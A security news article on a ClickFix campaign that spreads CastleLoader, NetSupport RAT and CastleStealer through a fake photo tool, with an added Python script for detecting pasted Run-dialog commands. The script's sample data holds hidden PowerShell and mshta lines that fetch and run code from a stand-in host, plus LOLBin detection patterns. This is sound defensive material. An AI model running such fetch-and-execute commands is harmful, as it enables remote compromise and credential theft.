- A fake photo tool ranking high in search results tricks users into running malware via ClickFix tactic.
- Victims are first infected by CastleLoader, which then deploys NetSupport RAT and a custom CastleStealer.
- The campaign highlights how SEO poisoning and social engineering can turn simple tasks into credential theft and remote compromise.
A website promising to remove the background from selfie photos is really just delivering information-stealing malware to users’ computers, security researchers say.
Researchers at Huntress describe a website that, through SEO poisoning, clawed its way to the top of search engine results pages, so that people searching for a background removal tool had a high chance of landing on this particular malicious site.
Photos submitted to the service are never processed; nothing is actually uploaded or shared. Instead, the site asks the user to “verify that they are human” by opening the Windows Run dialog and pasting a command that the page has already placed on their clipboard.
CastleLoader, CastleStealer and NetSupport RAT
In typical ClickFix fashion, the attackers get victims to run the malware themselves. The pasted command first infects the device with CastleLoader, the primary loader used to deliver additional payloads.
Using CastleLoader, attackers can then deploy second-stage malware, including NetSupport RAT and CastleStealer.
The first is a Remote Access Trojan (RAT) that allows attackers to remotely access infected systems, while the second is a custom .NET stealer that targets browser credentials, crypto wallet data, Discord tokens, and Telegram session files.
“What started as someone potentially trying to remove the background of a selfie ended with a custom .NET stealer snooping through their browser passwords, crypto wallet vaults, and Telegram session, as well as dropping a NetSupport RAT onto disk for later access,” Huntress explained.
ClickFix attacks can be mitigated through education: users should know that no legitimate service will ask them to prove they are human by performing an action on their own device, such as opening Run and executing a pasted command. Administrators can also disable the Run dialog (and with it the Win+R shortcut), for example through the “Remove Run menu from Start Menu” Group Policy setting, making it less likely that victims will actually execute the malicious command.
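Education and disabling Run are preventive; the same ClickFix mechanics also give defenders a detection and forensic hook, because anything pasted into the Run dialog is launched as a child of explorer.exe, and the Run dialog records every submitted line in the RunMRU registry key. The following is an added example written for this article, not Huntress' tooling and not the campaign's actual command line; the process events, command lines and the verify.example.invalid hostname are constructed stand-ins. It flags a shell or LOLBin spawned by explorer.exe whose command line carries download, in-memory execution, hidden-window or encoding traits, and it reconstructs the submitted Run commands from RunMRU values (which Windows stores as command text followed by a trailing "\1", ordered by the MRUList value).

```python
"""ClickFix execution detection over constructed process-creation events.

Added example for this article; not Huntress' code, and the command lines
below are constructed, not the campaign's real payload. Rule: the Run dialog
(Win+R) is hosted by explorer.exe, so a pasted ClickFix command shows up as
explorer.exe spawning a shell or LOLBin with a suspicious command line.
"""
import re
from dataclasses import dataclass

# Interpreters and LOLBins commonly used as the first hop of a pasted command.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "msiexec.exe", "rundll32.exe",
    "regsvr32.exe",
}

# Command-line traits: remote fetch, in-memory execution, hiding, encoding.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "in_memory_exec": re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|downloadstring)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
}


@dataclass
class ProcessEvent:  # Sysmon Event ID 1 style fields
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    image: str
    indicators: list
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_clickfix(event: ProcessEvent):
    """Return a Finding if the event looks like a pasted ClickFix command, else None."""
    if basename(event.parent_image) != "explorer.exe":
        return None  # parent-scoped: Run dialog launches are children of explorer.exe
    if basename(event.image) not in LOLBINS:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(event.command_line)]
    if not hits:
        return None  # explorer.exe -> cmd.exe with a plain command is ordinary user activity
    return Finding(basename(event.image), hits, event.command_line)


def runmru_commands(values: dict) -> list:
    """Recover Run dialog history from HKCU\\...\\Explorer\\RunMRU values.

    Each value is 'command\\1'; MRUList lists the value names, newest first.
    """
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def scan(events):
    return [f for f in (detect_clickfix(e) for e in events) if f]


# Constructed sample telemetry (hostname and paths are hypothetical).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 r"notepad.exe C:\Users\alice\notes.txt"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c ipconfig /all"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -nop -c "iex (irm http://verify.example.invalid/check)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://verify.example.invalid/human.hta"),
    # Same command, but from an IDE rather than the Run dialog: outside this rule's scope.
    ProcessEvent(r"C:\Program Files\Code\Code.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "iex (irm http://verify.example.invalid/check)"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"ALERT {f.image}: {', '.join(f.indicators)} :: {f.command_line}")
    print(runmru_commands({"MRUList": "ba", "a": "notepad\\1",
                           "b": 'powershell -w hidden -nop -c "iex (irm http://verify.example.invalid/check)"\\1'}))
```

The rule is deliberately scoped to explorer.exe as the parent so that developers running the same PowerShell from a terminal or IDE do not trip it; broaden the parent set only with a matching allow-list. The RunMRU parser is useful in incident response because the pasted line survives there after the loader process has exited.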
